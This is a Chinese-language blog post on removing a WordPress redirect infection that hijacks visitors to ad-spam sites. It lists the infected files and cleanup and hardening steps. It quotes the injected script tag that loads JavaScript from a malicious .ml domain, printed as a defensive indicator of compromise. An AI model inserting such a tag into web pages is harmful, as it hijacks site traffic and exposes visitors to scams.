Wordpress Redirect Infection

WordPress中木马病毒后跳转到恶意网站的解决办法

WordPress是很多外贸自建站的首选,全球35%的网站都在使用WordPress,生态完善,插件和主题都非常丰富,也正因为此,WordPress的安全也比较重要。今天一个外贸网站无法正常访问,打开网站就会跳转到其他垃圾网站,很明显是中了病毒,被恶意跳转了。奶爸这里记录一下如何清除这种恶意跳转到其他网站的WordPress病毒木马脚本

WordPress恶意跳转

病毒状态

这种恶意跳转的病毒本身对网站数据并没有什么直接的损害,只不过插入了恶意脚本让你网站无法打开,通过劫持你网站的流量,实现跳转到其他网站,然后欺骗用户允许浏览器通知之后,通过给浏览器弹广告来盈利。(如果你正好中招了,参见Windows10系统右下角Chrome弹窗广告关闭方法

病毒原理

这个病毒的原理就是,通过某些漏洞篡改了网站的部分文件数据(部分木马还会插入数据库),插入恶意脚本。当用户访问网站时,脚本运行,自动劫持流量跳转到恶意网站上面。

奶爸今天接触到的这个木马脚本是给网站插入了下面这串脚本:

<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>

恶意脚本插入到了网站上的一些文件里面,例如下面这些文件(不仅仅是这几个):

  • index.php
  • wp-config.php
  • wp-settings.php
  • wp-load.php
  • .htaccess

主题文件 (wp-content/themes/{themeName}/)

    • footer.php
    • header.php
    • functions.php

还有一些插件的文件也会被污染。

清除方法

奶爸今天碰到的这个木马不光修改了网站文件数据,同时还污染了数据库。所以我们需要同时清除文件和数据库的病毒才能恢复网站正常。

方法一:使用网站备份数据恢复

如果你有备份的习惯,那么你可以直接把之前备份的网站数据库和文件直接恢复,这个是最快的解决办法。

相关文章:

方法二:手动清除木马脚本

如果你没有备份,那么就比较麻烦了,我们需要手动来清理木马脚本。

1、我们通过文件管理器(cPanel、宝塔面板、FTP等方式)访问网站根目录,然后打开index.php,可以看到在文件最开始插入了恶意脚本,如下图:

WordPress恶意跳转脚本

检查主题文件,会发现插入的有下面这串代码:

WordPress恶意代码

 

2、把网站上所有被感染的文件都删除。

当然,让你一个一个去检查这些文件,然后删除,是一个大工程,所以可以直接把你上传文件夹保留,其他文件夹全部删除,去下载最新的WordPress安装包上传覆盖。

3、上传安全的网站文件到服务器。

4、进入数据库后台清理被污染的数据库内容。

数据库恶意脚本

上图中是在数据库里面发现的恶意脚本数据,我们需要手动清除掉。

5、安装一个Wordfence扫描一下网站文件,是否有漏网之鱼。

到这里,网站上的恶意脚本文件应该就清理完毕了,网站可以正常访问了。

安全防护

清理完毕了病毒,为了防止再次被黑,所以我们需要做好WordPress的安全工作,奶爸给大家总结的经验有以下几条:

  1. 管理员账号一定要设置安全的密码,最好是使用WordPress自动生成的那种高强度密码;
  2. 保持WordPress版本和插件版本的更新,很多外贸网站都是从来不更新的,难免就会碰到有漏洞的版本;
  3. 不要安装来历不明的主题和插件,破解的不确保安全的情况下最好不要安装;
  4. 服务器安全也要考虑到,保持服务器软件的版本更新,安全的密码;
  5. 可以安装一个安全插件,不过经验告诉奶爸,碰到牛逼的病毒,安全插件一样没用。

所以总的来说,最安全的方法还是保证密码安全,保证不乱装插件和主题,保持版本最新。

最后,如果你网站木马还未清除,可以联系奶爸付费帮你操作。

3/5 - (2 votes)
滚动至顶部